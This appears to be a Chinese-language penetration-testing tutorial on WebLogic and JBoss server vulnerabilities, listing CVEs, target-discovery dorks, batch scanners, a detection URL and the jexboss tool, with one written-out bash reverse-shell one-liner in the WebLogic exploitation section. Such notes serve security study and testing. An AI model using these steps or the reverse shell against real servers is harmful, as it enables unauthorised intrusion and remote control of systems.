文章目錄
- 一 Weblogic
- 1.1 Weblogic相關漏洞
- 1.2 Weblogic漏洞發現
- 1.3 Weblogic漏洞利用
- 二 Jboss
- 2.1 Jboss漏洞
- 2.2 Jboss識別與漏洞利用
一 Weblogic
- WebLogic 是由 Oracle公司 開發的一款基于Java EE(現稱Jakarta EE)的企業級應用服務器,主要用于部署、運行和管理分布式Web應用、企業應用和微服務。
- 優勢:成熟穩定,適合大規模關鍵業務、深度集成Oracle數據庫及其他中間件(如SOA Suite)。
劣勢:配置復雜,學習曲線陡峭、資源占用較高,成本昂貴(相比開源替代品如WildFly/TomEE)。
1.1 Weblogic相關漏洞
主要受影響版本:
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.1
Weblogic 12.2.1.2
Weblogic 12.2.1.3
Weblogic 14.1.1.0
- 弱口令:Weblogic存在管理后臺,通過賬號密碼登錄,由于管理員的疏忽,經常會使用弱口令,或者默認的賬戶名密碼。
- SSRF漏洞(CVE-2014-4210):Weblogic中存在一個SSRF漏洞,利用該漏洞可以發送任意HTTP請求,進而可以攻 擊內網中redis、fastcgi等脆弱組件。
- SSRF(Server-Side Request Forgery,服務器端請求偽造)。SSRF是一種安全漏洞,攻擊者誘使服務器向內部或外部的非預期系統發起惡意請求,從而繞過訪問控制、探測內網或攻擊其他服務。
- 漏洞原理
- 攻擊者控制目標服務器的請求目標:通過篡改URL、參數或文件上傳等功能,讓服務器代替攻擊者訪問內網資源、第三方系統或敏感接口。
- 服務器的高權限:服務器通常能訪問內網(如數據庫、管理后臺),而外部用戶無法直接到達這些資源。
- 任意文件上傳漏洞 (CVE-2018-2894):Web ServiceTestPage 在"生產模式”下默認不開啟,所以該漏洞有一定限制。“利用該漏洞,可以上傳任意jsp文件,進而獲取服務器權限。
- XML Dec0der反序列化漏洞(CVE-2017-10271):Weblogic的WLSSecurity組件對外提供webservice服務,其中使用了XMLDecoder來解析用戶傳入的XML數據,在解析的過程中出現反序列化漏洞,導致可執行任意命令。
- Java反序列化漏洞(CVE-2018-2628):Oracle 2018年4月補丁中,修復了Weblogic Server WLS Core Components中出現的一個反序列化漏洞(CVE-2018-2628),該漏洞通過t3協議觸發,可導致未授 權的用戶在遠程服務器執行任意命令。
1.2 Weblogic漏洞發現
- 獲取資產:shodan、fofa、鐘馗之眼等,
app="BEA-WebLogic-Server"。
google hackhinginurl:漏洞地址
、intitle:weblogic
等。 - 批量掃描腳本:WeblogicScan。
- 漏洞路徑:
_async/AsyncResponseService
1.3 Weblogic漏洞利用
驗證掃描結果(執行命令and反彈shell)
- 執行掃描命令
python3 WeblogicScan -f target.txt
,然后利用Java反序列化漏洞利用工具,選擇發現的漏洞類型和服務器的地址,進行檢查,即可實現命令執行。
- 反彈shell
bash -i >& /dev/tcp/ip/port 0>&1
二 Jboss
- JBoss(現稱 WildFly)是一款開源的、基于Java EE(現Jakarta EE)的應用服務器,由Red Hat公司開發和維護。它用于部署和管理企業級Java應用(如Web服務、分布式系統等),提供高性能、模塊化架構和豐富的企業功能。
組件 | 功能說明 |
---|---|
Undertow | 高性能Web服務器(默認替代Tomcat),支持HTTP/2和WebSocket。 |
Hibernate | 集成ORM框架,簡化數據庫操作。 |
Infinispan | 分布式緩存系統,用于集群會話共享。 |
Arquillian | 測試框架,支持容器內自動化測試。 |
Management Console Web | 管理界面(默認端口9990),監控和配置服務器。 |
2.1 Jboss漏洞
Jboss歷史漏洞 (反序列化漏洞)
- JBoss JMXlnvokerServlet 反序列化漏洞 (CVE-2015-7501)
- JBossEJBlnvokerServlet反序列化漏洞
- JBosS AS 6.X 反序列化漏洞(CVE-2017-12149)
- JBoss 4.xJBossMQJMS 反序列化漏洞(CVE-2017-7504)
Jboss歷史漏洞 (訪問控制不嚴導致的漏洞)
- JMXConsole未授權訪問Getshell
- JMX Console HtmlAdaptor Getshell (CVE-2007-1036)
- JMX控制臺安全驗證繞過漏洞(CVE-2010-0738) Administration
- Console 弱口令 Getshell
2.2 Jboss識別與漏洞利用
- Jboss漏洞檢測(批量):jbossScan
- CVE-2017-12149漏洞檢測:http://ip:8080/invoker/readonly訪問該url,若顯示狀態碼為500的報錯界面,則證明漏洞存在。
- CVE-2017-12149漏洞概述:該漏洞為 Java反序列化錯誤類型,存在于 Jboss 的 Httplnvoker 組件中ReadOnlyAccessFilter過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的數據流進行反序列化,從而導致了漏洞。
- CVE-2017-12149漏洞利用(反彈shell):工具https://github.com/joaomatosf/jexboss。